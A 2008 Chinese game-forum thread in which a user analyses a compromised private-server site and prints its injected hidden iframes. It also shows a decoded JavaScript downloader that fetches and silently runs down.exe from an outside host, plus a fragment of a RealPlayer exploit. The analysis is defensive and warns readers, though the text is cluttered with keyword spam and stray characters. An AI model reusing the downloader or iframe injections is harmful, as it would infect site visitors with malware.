16 12
发新话题
打印

[讨论] cg23分析

cg23分析

Host: www.cg23.cn
* [. w+ S9 t$ Y$ `魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表Content-Location: http://www.cg23.cn/Index.htmbbs.mocwww.com' G. l3 ]0 W/ m( P) t
--src
5 B; N3 R7 s; I魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表2 A  F! U* }) p; c# @
<script language="JavaScript" type="text/JavaScript" src="http://news.baidu.com/ns?word=title%3A%C4%A7%C1%A6%B1%A6%B1%B4&tn=newsfcu&from=news&cl=2&rn=25&ct=0"></script>& f5 K  P  |; U
--百度新闻-魔力宝贝妖城在线论坛1 Z/ ^0 ?/ R  Z$ g. D

! `3 m: K( r* l& ^4 S0 I1 ]bbs.mocwww.comhttp://wpa.qq.com/pa?p=1:******************魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表( R9 U+ S8 e# J8 B
10数个魔力技术顾问的QQ链接bbs.mocwww.com# v: b; k" n( g

6 ]6 V' H! E- L1 }/ u/ h<script src="javascript/jf.js" type="text/javascript"></script>
7 o& u3 y& G; w' m5 Tbbs.mocwww.com//模仿语言包式的简繁转换功能插件!
/ v9 `8 S* B4 U4 j0 u" S1 Y. G魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表
$ w7 G) U0 N$ m' ~魔力私服,最新魔力宝贝私服技术交流<script language="javascript" type="text/javascript" src="http://js.users.51.la/1326170.js"></script>
2 W8 m( V0 }% ^7 V—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート51.la流量统计—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート- k6 f  i) z+ Z& @4 A

% }% s+ \! T# T/ x<script src='http://s71.cnzz.com/stat.php?id=722391&web_id=722391&online=2' language='JavaScript' charset='gb2312'></script>魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表: N* e* T6 l0 A* n9 E. i/ b- i
cnzz流量统计—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート% [5 E# I4 _* {3 s) s
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表% _9 r3 b( s) Y9 u
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=361527223&logo=12"></script>—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート/ B* X& H1 [  ~4 h' `& ?3 ?- ]" `: f
51YES网站统计
& L$ H2 Q3 C6 v' Y2 e, C  s! R1 F
( j, w" M% h  ~" F; b& W3 Pbbs.mocwww.com<iframe src=http://1.100190.com/1.htm?6 width=50 height=0></iframe></a>魔力私服,最新魔力宝贝私服技术交流! f. R9 x9 ?. ~
下面是1.htm的内容bbs.mocwww.com9 m$ B5 }0 l; l: U
[<iframe src=http://1.100190.com/d/d.htm width=100 height=100></iframe>魔力私服,最新魔力宝贝私服技术交流$ S! w" @1 b! u2 q+ i1 E5 d9 Y
<iframe src=http://1.100190.com/d/06014.htm width=100 height=100></iframe>. C7 ^9 J7 r* z- i/ \# Z5 F$ {
<iframe src=http://1.100190.com/d/real.htm width=100 height=100></iframe>

1 N+ |: c/ |1 h$ u7 Dbbs.mocwww.com这里是重点了魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表( _3 u* l0 `+ ?8 C8 A
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1586580.js"></script>
* l* X. c- K0 I—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート51.la流量统计
6 p5 M* \1 C$ }% ^8 ^4 i: r  A魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表]bbs.mocwww.com9 n6 S5 v% j6 X
闲来无事,给大家分析一下吧
  X1 V) T" d8 @bbs.mocwww.com06014.htm        看名字好像是蛮老的那个溢出洞洞bbs.mocwww.com* a* c/ u6 G( v( N
解码后
5 _1 e" H( J( mbbs.mocwww.com<script>var fuck,cike;fuck="http://1.111281.com/down.exe";cike="cike.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var as=ado.createobject(ln+lzn+an,"");var h=1;xml.Open("GET",fuck,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(cike,2);as.close();var shell=ado.createobject("Shell.Application","");shell.Shellexecute(cike,"","","open",0);}catch(e){};</script>bbs.mocwww.com  ~4 M# p3 X3 O/ g6 b& W
貌似是个下载者饿,打包了,大家没事研究研究 我就跳过了……
, B) E+ ?& M0 u# u  u" Q3 F魔力私服,最新魔力宝贝私服技术交流
7 T/ ~1 x6 J1 N魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表d.htm        解码之
. I' ^* c( o  T; X, w2 _2 D—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート<iframe style=display:none src="http://1.100190.com/d/bf.htm"></iframe>
) @; ?) C  y# K# r% o) V. A呜呜,我们继续
1 z# j. p, d- {* a魔力私服,最新魔力宝贝私服技术交流空文件,可能是后备用的吧
% K# _& k6 Z( r+ l! Q* x: Nbbs.mocwww.com魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表- `2 A, ~' B7 J
real.htm        看名字可能根播放器的oday有关
6 s( ]3 T: H$ O0 i魔力私服,最新魔力宝贝私服技术交流解码之——魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表4 @9 @( S$ M4 y* f8 L: k3 Z! V
function RealExploit(){afdsffffasdf="flsdajflasdjfl32rewr231ffas";var ……
; D) `9 H1 Y2 q9 ]0 i魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表恩,查资料得知为机器狗病毒,不过不玩这个 不大懂6 [& B$ J4 j; z2 v/ A* f
好了,确定是网马,至于效果如何,反正我没中招……

0 Q# P) ?2 @4 Q妖城在线论坛—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート9 Z3 Q6 K1 P: H7 x* N( W
就酱子吧,很多防护不好的网站都会被人挂马,希望cde尽快处理,我对其人没有任何恶意的,大家不要有事没事就对他妄加否定,
' o4 c# W& Q( ]# {+ i+ n3 R想想 人家辛辛苦苦为了什么那?开那么多群,没说过收费什么的吧? 有知道的东西就共享出来 也没见藏着掖着吧?
6 }2 z7 S9 L; I5 S* _妖城在线论坛紫薇剑是谁我不晓得,+ v, r! Z- D1 C' t8 p4 q
但是cg23的ange我还是打过交道的……
魔力私服,最新魔力宝贝私服技术交流: @0 c: F7 S8 V8 e# l! C0 Y

. o/ X, @4 \. A8 E+ h& u—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート<param name="URL" value="http://www.jdzblog.com/uploadfiles/2007-3/327162852.mp3">, e9 X% {7 E1 E% K: d6 b0 K/ |5 ~! x
最后给大家附个音乐 深吸一口气,放松一下,没什么大不了的……

0 C& Y5 R" X; Y' M2 x6 ?妖城在线论坛
2 \* _. L7 @4 l& xbbs.mocwww.com[ 本帖最后由 myzz01 于 2008-2-4 21:53 编辑 ]

TOP

那个是内嵌的JS调用溢出马.很老的一种了..—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート2 O) d" G& R2 G: v. s2 }( J
LS的兄弟我劝你..—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート9 T+ v" b. h+ M/ i# O1 k
搞CG,不知道紫薇剑,就和中国人不知道毛泽东一样.5 V6 ~! Y! a3 _0 F. g
你没资格说内些话..
你的名气很大,并不代表着你很强大。

TOP

魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表) [  h9 z% _* v3 A% u" V
开那么多群.从来没说过话.
/ y7 I8 h4 D7 j* B' H0 z—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート和某XXOO反挂不一样?魔力私服,最新魔力宝贝私服技术交流- ^5 H5 f& H9 R' ]
技术群一大堆.问问题没见回.0 D4 q; ^0 T2 t& Y# H, y5 E1 U
一买他东西积极的很.
* n* D' R  s( Y' T1 A' Y魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表
6 E7 d; Z9 y! Q  _0 s% b妖城在线论坛
4 l9 g; H: k3 s* U: [' c—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート他现在扔出来的东西都是别人淘汰的.
# y% w4 g9 _3 v3 k" X魔力私服,最新魔力宝贝私服技术交流也不知道谁抱着一套所谓的反挂,还当宝咧..
你的名气很大,并不代表着你很强大。

TOP

这样啊··

TOP

那个  资格不晓得要怎么赚取 …… :-)  是不是当中国人只要知道毛泽东就具备中国人的血统了?估计某些知道老毛的小日本要雀跃了……
, N) X! W) B4 @+ |妖城在线论坛血统是与生俱来的,根毛泽东关系不大,我的资格 仿佛也根我知道不知道紫薇剑关系不大吧?bbs.mocwww.com4 [- Y1 {% Z+ _$ y0 Q
我喜欢根海星兄 妖哥 小男这样说话爽快的人交流,至于不从技术方面讨论问题 而专门搞人事鉴定的……  不是很感冒……
0 i' l8 u  @- c# ?/ R# ^bbs.mocwww.com(*^__^*)   随便说说拉 ange真的打了很久叫道的 从我开始研究魔力(快1个月了) 没事都会在QQ上交流下的 ——感觉人有点迷糊 但是没有什么坏心眼吧?
( g4 {' ^# u2 h1 ?: }+ c& Sbbs.mocwww.com 至于FGMAX :) 我可是加你QQ拜师的哦 可惜你不回复…… 唉  要不现在收下我吧?

TOP

我,大家都知道,对话不对人。
9 ~3 `- {- h# b6 e: `. g1 X要是惹着你了就当别在意。妖城在线论坛5 {% X& V+ I4 j4 Z
妖城在线论坛' i1 T" o; P5 W+ s4 |+ ?! X& d
加我人太多,每天问问题人也太多。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表* v; l. [' x) k1 \0 e
不能一一照料。
/ O- k2 j3 I  g魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表1 ?2 ?$ E$ o+ i  T: L; \6 t# A  d
我就收了一个徒弟,晨曦。
8 x! h. u% y1 |( [+ ~魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表
: k4 s5 m% x9 i% \  n; q8 t妖城在线论坛以后有需要就说,知道肯定告你。
你的名气很大,并不代表着你很强大。

TOP

引用:
原帖由 FGMAX 于 2008-2-4 22:08 发表
6 |2 v& O5 h: i' Z& ]我,大家都知道,对话不对人。
, Y. |/ U% L+ W7 S) ]; t魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表要是惹着你了就当别在意。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表8 e( k: b; }9 T/ I3 w5 m2 F

8 Z9 ^4 x: G0 g1 `! E5 j魔力私服,最新魔力宝贝私服技术交流加我人太多,每天问问题人也太多。魔力私服,最新魔力宝贝私服技术交流+ x  Y7 K$ }( l! [' }
不能一一照料。—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート) n4 K% H, e" c+ y3 C8 P
bbs.mocwww.com& ]( ^0 z9 V0 k' [
我就收了一个徒弟,晨曦。
% y4 n4 ]9 Y  J* _—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート7 S2 m9 j) l1 d
以后有需要就说,知道肯定告你。
魔力私服,最新魔力宝贝私服技术交流4 m+ ~) v. ~2 f* ]2 `

. [) D, v, V- u+ X# g, c, G7 L魔力私服,最新魔力宝贝私服技术交流
9 S) B2 q) S' E魔力私服,最新魔力宝贝私服技术交流:)  交个朋友 一起交流饿 …… 我去想办法看懂魔力封包处理部分的代码去…… 想学的东西太多 时间太少 一动就该睡觉了……郁闷 HOHO  晚上见……

TOP

回家前 上来看看—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート9 ~9 h8 |# d- m+ w

TOP

RealPlayer 的溢出漏洞,打完RealPlayer溢出补丁的不会中.

TOP

RealPlayer 不装呢- -

TOP

CG23就是白吃,乱吧人的QQ放在他网页上当什么顾问  我日

TOP

引用:
原帖由 ?k|尛水 于 2008-2-4 22:53 发表 —魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート5 x5 j0 k* `8 z3 i' o/ G1 \/ g
RealPlayer 不装呢- -
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート2 f  @( H" M8 F6 k  @$ @
不装当然就中不了real的0day了,不过其他溢出漏洞不胜枚举,而且就算不中马,被挂马的站访问起来也会很慢…… 经常访问很容易体会出区别…… 中木马也一样 你要经常使用电脑就会有手感的 当机器中木马病毒什么的 你就会感觉不顺手了……

TOP

呵呵...real我就没装过~~呵呵..

2007年10月6日至今已过去十三个春夏秋冬,感谢妖友的一路陪伴!
2020年6月12日 By.xuyaoxy

TOP

我问问无双,是被人挂了还是自己搞的……。它那站流量也没多少,应该不至于坏自己的名声做这种事。妖城在线论坛8 V0 g) _6 u& Y7 D8 L( L" i. I6 d
bbs.mocwww.com; j8 t* u1 Y& o1 X' o$ r- `- }& P
现在有马是事实了
妖城欢迎您!

TOP

没说过收费?那他的高级群谁出的QB,你也不想想

TOP

 16 12
发新话题